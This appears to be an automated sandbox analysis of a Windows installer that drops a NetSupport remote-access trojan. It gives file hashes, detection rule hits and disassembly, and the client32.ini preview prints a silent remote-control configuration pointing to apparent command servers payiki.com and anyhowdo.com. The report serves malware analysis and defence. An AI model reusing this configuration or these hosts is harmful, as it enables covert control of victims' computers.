                                                                                                                                                                                                  SHA1:892A656DA1EA264C73082DA8C6E5F5728ABCB861
                                                                                                                                                                                                  SHA-256:6A7C99E4BD767433C25D6DF8DF81BAA99C05DD24FA064E45C306FF4D954E1921
                                                                                                                                                                                                  SHA-512:0DAFC66222BBFCB1558D9845EE4DDEB7A687561B08B86A07B66B120C22952A8082E041D9234D9C69C8ADE5D4DAE894D3F10AFD7BA6DD3F057A08FB5D57C42112
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:1200..0xaeabfe5c....; NetSupport License File...; Generated on 13:16 - 19/09/2017........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=GFHJJYU43..maxslaves=100000..os2=1..product=10..serial_no=NSM832428..shrink_wrap=0..transport=0..

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\SystemUtil\PCICHEK.DLL

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18808
                                                                                                                                                                                                  Entropy (8bit):6.22028391196942
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                                                                                                                                  MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                                                                                                                                  SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                                                                                                                                  SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                                                                                                                                  SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SystemUtil\PCICHEK.DLL, Author: Joe Security
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\SystemUtil\PCICL32.DLL

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3642864
                                                                                                                                                                                                  Entropy (8bit):6.5156874906689275
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:5fgiLcxYMP9Y7fPUVBS7jNOXhmSTwpa1ycVSENqb:5fhLcxYMePUCjzGS7
                                                                                                                                                                                                  MD5:214A714EF11C2C91162A9344BF8F2E50
                                                                                                                                                                                                  SHA1:B87886B6B1E48E5E54E3033BE9A73B67B5A5C282
                                                                                                                                                                                                  SHA-256:74DFCD891813058B29B0A70EC0A95F31CD5356F175AD3A492DAECBC52542E76F
                                                                                                                                                                                                  SHA-512:A785D390C7E066628C9894302CA10AC21BA79D9988523D5ABCB960870A39112D01984A86CDE0BCD3862D46D82696E35BA760D96A389C96553ECB1DB9C3A0D97D
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\SystemUtil\PCICL32.DLL, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SystemUtil\PCICL32.DLL, Author: Joe Security
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h..........<G.............-..........q............q.....q......-.Q....,.|.....................Rich............PE..L.....3V...........!.................^.......................................08.......7.....................................t........ ..P............x7.......6.........................................@...................8x..`....................text............................... ..`.rdata..............................@..@.data....%..........................@....tls.................t..............@....hhshare.............v..............@....rsrc...P.... .......x..............@..@.reloc...,....6......J5.............@..B................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\SystemUtil\TCCTL32.DLL

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):459760
                                                                                                                                                                                                  Entropy (8bit):6.678291257338415
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:suqhtvbez3wj9AP8Ah0DAmlse99fow3/qkxf5iJg0nTUtnTvm:s3htk/eHoJktEKITUFTvm
                                                                                                                                                                                                  MD5:69F72AD2DAD99FF0FBC7F2C671523014
                                                                                                                                                                                                  SHA1:8AAAB0955014B89CA794A51DD527D3AFE6F38A94
                                                                                                                                                                                                  SHA-256:23F17CC168CC82B8AE16F3FC041D4465E1B12E66DCAC1713F582F99303A740DD
                                                                                                                                                                                                  SHA-512:EA18D92790F52405027666B7501CF908426B9B57FEC4157A45D86387D50324E414644245269DC1A0567B27C6C4B7C4B323D692BF449ADD4797DFCD7101531349
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SystemUtil\TCCTL32.DLL, Author: Joe Security
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..~..L~..L~..L..pLi..L~..L..Lw.}Ls..L..DL..L..EL6..L..uL...L..tL...L..sL...LRich~..L................PE..L....J.`...........!.....>...r......n7.......P...............................P......1.....@..........................Q..m....D..........@................O.......I...R..............................P&..@............P...............................text...l=.......>.................. ..`.rdata.......P.......B..............@..@.data...H....`.......H..............@....rsrc...@............`..............@..@.reloc...J.......L...h..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):121304
                                                                                                                                                                                                  Entropy (8bit):6.150456878585649
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:Wm8j0+RvW6XhBBxUcnRWIDDDDDDDDDDDDDDDDADDDDDDDDDDDDDDDDDDDDDDXDJg:WbpvWiLniepfxP91/bQxEj
                                                                                                                                                                                                  MD5:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                                                                                                  SHA1:E533F2318D232EF3E1B22BDD1D6B61C081C6D6EB
                                                                                                                                                                                                  SHA-256:AAA12A1AD8C748FBFD4C8F2E5023EC3481B18CB088B28737FC7E665163CFF41D
                                                                                                                                                                                                  SHA-512:4C338E4F87F5AC9E9339E663739B021F06D8EE48F7A5981CCDF85029888964E3C416331C7EC791933A6B3D56EC44BB3719A38039F625A25B86BA0264E3D2D609
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe, Author: Joe Security
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H..&...&...&.<.{...&...'...&.@."...&...-...&.x. ...&.Rich..&.........PE..L...m1.Q............................ ........ ....@..........................................................................0..<....@..pu..........H................ ..............................................X0...............................text............................... ..`.rdata....... ....... ..............@..@.idata.......0.......0..............@....rsrc...pu...@.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\SystemUtil\client32.ini

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):638
                                                                                                                                                                                                  Entropy (8bit):5.396410176198281
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:kA2yTumGSqX4Ba/vpVSxOZ7zH+SHCPfu8AeCYubluxWkdcJPPGY:kttm18mxONeSorbu8eJ3f
                                                                                                                                                                                                  MD5:74BEF725496CD35EEB6F6B94E1EDDDFD
                                                                                                                                                                                                  SHA1:616AB761A1429E982062009B5C319F796A60BA1B
                                                                                                                                                                                                  SHA-256:8E016CA1A0837CA5F7D87656FE4153ED8639D33ADBEE9B07A3D033DB44EEC2A7
                                                                                                                                                                                                  SHA-512:C7DCFF6FF56DE463B5AB4CE89A9C6BFE5A021CABF959DA1AEF6D0DF19FA22376BD1D30749AD7A95315078F8007AF496DE3754A26A8C6C15294F31982E4F945B1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:0x562f5eff....[Client].._present=1..DisableReplayMenu=1..SecurityKey2=dgAAAFOeoOz0f0kq5efuvoPnH(MA..Protocols=3..SOS_RShift=0..DisableChat=1..Shared=1..ValidAddresses.TCP=*..silent=1..AlwaysOnTop=0..SOS_Alt=0..DisableMessage=1..SOS_LShift=0..DisableRequestHelp=1..SysTray=0..UnloadMirrorOnDisconnect=0..DisableChatMenu=1..DisableDisconnect=1..AutoICFConfig=1..Usernames=*....[_License]..quiet=1....[_Info]..Filename=C:\Users\Public\Pictures\client32-U.ini....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=payiki.com:443..GSK=FN9L=MBNHG;C=P@FFA;P?DAI9F<F..Port=443..SecondaryGateway=anyhowdo.com:443..SecondaryPort=443..

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\SystemUtil\msvcr100.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):773968
                                                                                                                                                                                                  Entropy (8bit):6.901559811406837
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                                                                                                                  MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                                                                                                                  SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                                                                                                                  SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                                                                                                                  SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\SystemUtil\nskbfltr.inf

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                  Entropy (8bit):4.93007757242403
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                                                                                                                  MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                                                                                                                  SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                                                                                                                  SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                                                                                                                  SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\SystemUtil\nsm_vpro.ini

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):46
                                                                                                                                                                                                  Entropy (8bit):4.532048032699691
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                                                                                                                                                                  MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                                                                                                                                                                  SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                                                                                                                                                                  SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                                                                                                                                                                  SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\SystemUtil\pcicapi.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):33144
                                                                                                                                                                                                  Entropy (8bit):6.737780491933496
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                                                                                                                                  MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                                                                                                                                  SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                                                                                                                                  SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
                                                                                                                                                                                                  SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SystemUtil\pcicapi.dll, Author: Joe Security
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\SystemUtil\remcmdstub.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):72584
                                                                                                                                                                                                  Entropy (8bit):6.671736046146569
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:0fanvXuNOwphKuyUHTqYXHhrXH4xLIyqxoiuwbioQ+Dwajduw9tQ+8iAAe:+anPSpAFUzt0xLIyqVD9njdFyDAe
                                                                                                                                                                                                  MD5:2A2FC166269EFE48D61CB1AB92215DC2
                                                                                                                                                                                                  SHA1:A5679174D941919BAF764F94640994C01D695625
                                                                                                                                                                                                  SHA-256:73A522D9FFA9235FE2B6FD1059C551F8022437EC0EEF62EBC07240158F84A2A6
                                                                                                                                                                                                  SHA-512:13F76217664056D1FBB106820A3A7E3F44E81CD373C812E89BD6D315AC2A188A8140E0EC0A7BDA02BE62AFAB86F8962340E5889C6BBE36305C96D700871F9E1E
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.|."...Rich#...........PE..L......^.....................J.......!............@.......................... ............@....................................<.......T................K..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\installPackage.zip

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2275903
                                                                                                                                                                                                  Entropy (8bit):7.997003172118591
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:49152:StY8YsXuUchyrrP04n5YQIQNtV8CyU7XBffG4ABLOdPY:v8Ysa8PDcQNtVzyc2JlOVY
                                                                                                                                                                                                  MD5:C56A7DCC8C1658FA154501AC0819BA7E
                                                                                                                                                                                                  SHA1:DF1910FF30AA8B64808B7BD7A6558FBFCF731A9A
                                                                                                                                                                                                  SHA-256:D43244539E6F2D18177BD4AEFA92D75F4DCA197B82D01E9D5B6065D501611AE6
                                                                                                                                                                                                  SHA-512:AA06D0B61B163B35B99DC7EDB61655BCB4D9B4C909E3EEBD0D4F587A9CEE8DE8FFD2A0E9FCA44E382D076AF2502EE962D73CD572BE39E8A35ABCFEDB0B386A96
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:PK.........0.6........H..... .nskbfltr.infUT...t..F...gt..Fux.............U....@......A<n..<IO+.(Eh...E.NF...dF.o..Z...B......p...3RlRBU....W..$....4l.. .!...QY. ^..m.%......SL......9.w.R.tv*....%.}..j..)...........0..F......V1.B6..y.WU...$..M....B1;~...&.)~...I....?.g..*_..R..PK.........H...PK...........W.............. .NSM.LICUT...l}.dl}.dl}.dux.............-..NB1...........]..(7..C...%,.n.....3....6_Sm.......w^..'...=......e.x.f+$dW. .I.=.{y#.|.....C.....tL.q.....hL>Q...D.j..8..W+ ..5\.....v.|^...../7...X.V...b...9...X@A.....f.:....Fx.@..7.......U.~.PK....k%........PK........S..<.............. .nsm_vpro.iniUT...n:.K...gn:.Kux..............v.........../JLO.w.KL.IM.5..rIM*M..I-K..qy..PK..I...-.......PK........bo.H........x..... .pcicapi.dllUT...x. W...gx. Wux...............\SG.8|.a@ (.D..E1...$,B.[.@.\A.`@..D..*1F.K..P...m.u_*.hk....Z..j...TQ.|..MX.>.............3s.....7....bQ..d.Q.......5@r.....}........2.........~ZJnn........\~...?'/].....k.q....{.Us.

                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                  General

                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Entropy (8bit):7.992821509941649
                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 98.45%
                                                                                                                                                                                                  • Inno Setup installer (109748/4) 1.08%
                                                                                                                                                                                                  • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                  File name:KC0uZWwr8p.exe
                                                                                                                                                                                                  File size:21'424'072 bytes
                                                                                                                                                                                                  MD5:3c387c0db035c0c3185d6fbd1ab46bd1
                                                                                                                                                                                                  SHA1:7b6e6212a6d13800282bd2cb362c2a311d89e543
                                                                                                                                                                                                  SHA256:a1720d68eef7dc381a533fd8584a227db3dbcaed16098a0d7f31077f95355e8c
                                                                                                                                                                                                  SHA512:a6e431c98cafaf3762d5d1d60ab337d4a002c0dd90ae830d6b513c97e333adc3bdf8ce70ad65d6149878fb48d94b762902038d44909b662603c6082997071e76
                                                                                                                                                                                                  SSDEEP:393216:xrjU2t/X9E3JMUNccjPql0NbgVunl22V5v+8gDRmffwuvO:tjU2p9EZvNdjP6Kbaunldv+8ORmXwu2
                                                                                                                                                                                                  TLSH:07273373B787A43EF09E1B3B15B2A16844FBA6116923AE1385F484BCCF650501E7F71A
                                                                                                                                                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                  Icon Hash:af4f59b4f071970c

                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Entrypoint:0x4a83bc
                                                                                                                                                                                                  Entrypoint Section:.itext
                                                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                  Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                  OS Version Major:6
                                                                                                                                                                                                  OS Version Minor:1
                                                                                                                                                                                                  File Version Major:6
                                                                                                                                                                                                  File Version Minor:1
                                                                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                                                                  Subsystem Version Minor:1
                                                                                                                                                                                                  Import Hash:40ab50289f7ef5fae60801f88d4541fc

                                                                                                                                                                                                  Authenticode Signature

                                                                                                                                                                                                  Signature Valid:false
                                                                                                                                                                                                  Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                                                                                                                  Signature Validation Error:A certificate was explicitly revoked by its issuer
                                                                                                                                                                                                  Error Number:-2146762484
                                                                                                                                                                                                  Not Before, Not After
                                                                                                                                                                                                  • 26/09/2024 07:47:26 27/09/2025 07:47:26
                                                                                                                                                                                                  Subject Chain
                                                                                                                                                                                                  • E=makedasalzbergneu79@gmail.com, CN=OMICARE JOINT STOCK COMPANY, O=OMICARE JOINT STOCK COMPANY, L=Ha Noi, S=Ha Noi, C=VN, OID.1.3.6.1.4.1.311.60.2.1.2=Ha Noi, OID.1.3.6.1.4.1.311.60.2.1.3=VN, SERIALNUMBER=0108523661, OID.2.5.4.15=Private Organization
                                                                                                                                                                                                  Version:3
                                                                                                                                                                                                  Thumbprint MD5:92142F58BB541C3BD5CD828C76AE0FC4
                                                                                                                                                                                                  Thumbprint SHA-1:56FC98490B4845072947536B9E0AC121A37744E6
                                                                                                                                                                                                  Thumbprint SHA-256:CF7A5967658B1BDB4A50A13D22EF734C707876B01D8D4B1F94FA493C5D4F3F57
                                                                                                                                                                                                  Serial:7F07AA1BB8A3B0183893B1AA

                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                  add esp, FFFFFFA4h
                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                  push esi
                                                                                                                                                                                                  push edi
                                                                                                                                                                                                  xor eax, eax
                                                                                                                                                                                                  mov dword ptr [ebp-3Ch], eax
                                                                                                                                                                                                  mov dword ptr [ebp-40h], eax
                                                                                                                                                                                                  mov dword ptr [ebp-5Ch], eax
                                                                                                                                                                                                  mov dword ptr [ebp-30h], eax
                                                                                                                                                                                                  mov dword ptr [ebp-38h], eax
                                                                                                                                                                                                  mov dword ptr [ebp-34h], eax
                                                                                                                                                                                                  mov dword ptr [ebp-2Ch], eax
                                                                                                                                                                                                  mov dword ptr [ebp-28h], eax
                                                                                                                                                                                                  mov dword ptr [ebp-14h], eax
                                                                                                                                                                                                  mov eax, 004A2EBCh
                                                                                                                                                                                                  call 00007F719CCC81A5h
                                                                                                                                                                                                  xor eax, eax
                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                  push 004A8AC1h
                                                                                                                                                                                                  push dword ptr fs:[eax]
                                                                                                                                                                                                  mov dword ptr fs:[eax], esp
                                                                                                                                                                                                  xor edx, edx
                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                  push 004A8A7Bh
                                                                                                                                                                                                  push dword ptr fs:[edx]
                                                                                                                                                                                                  mov dword ptr fs:[edx], esp
                                                                                                                                                                                                  mov eax, dword ptr [004B0634h]
                                                                                                                                                                                                  call 00007F719CD59B2Bh
                                                                                                                                                                                                  call 00007F719CD5967Eh
                                                                                                                                                                                                  lea edx, dword ptr [ebp-14h]
                                                                                                                                                                                                  xor eax, eax
                                                                                                                                                                                                  call 00007F719CD54358h
                                                                                                                                                                                                  mov edx, dword ptr [ebp-14h]
                                                                                                                                                                                                  mov eax, 004B41F4h
                                                                                                                                                                                                  call 00007F719CCC2253h
                                                                                                                                                                                                  push 00000002h
                                                                                                                                                                                                  push 00000000h
                                                                                                                                                                                                  push 00000001h
                                                                                                                                                                                                  mov ecx, dword ptr [004B41F4h]
                                                                                                                                                                                                  mov dl, 01h
                                                                                                                                                                                                  mov eax, dword ptr [0049CD14h]
                                                                                                                                                                                                  call 00007F719CD55683h
                                                                                                                                                                                                  mov dword ptr [004B41F8h], eax
                                                                                                                                                                                                  xor edx, edx
                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                  push 004A8A27h
                                                                                                                                                                                                  push dword ptr fs:[edx]
                                                                                                                                                                                                  mov dword ptr fs:[edx], esp
                                                                                                                                                                                                  call 00007F719CD59BB3h
                                                                                                                                                                                                  mov dword ptr [004B4200h], eax
                                                                                                                                                                                                  mov eax, dword ptr [004B4200h]
                                                                                                                                                                                                  cmp dword ptr [eax+0Ch], 01h
                                                                                                                                                                                                  jne 00007F719CD6089Ah
                                                                                                                                                                                                  mov eax, dword ptr [004B4200h]
                                                                                                                                                                                                  mov edx, 00000028h
                                                                                                                                                                                                  call 00007F719CD55F78h
                                                                                                                                                                                                  mov edx, dword ptr [004B4200h]

                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x992c.rsrc
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x146be880x2940
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
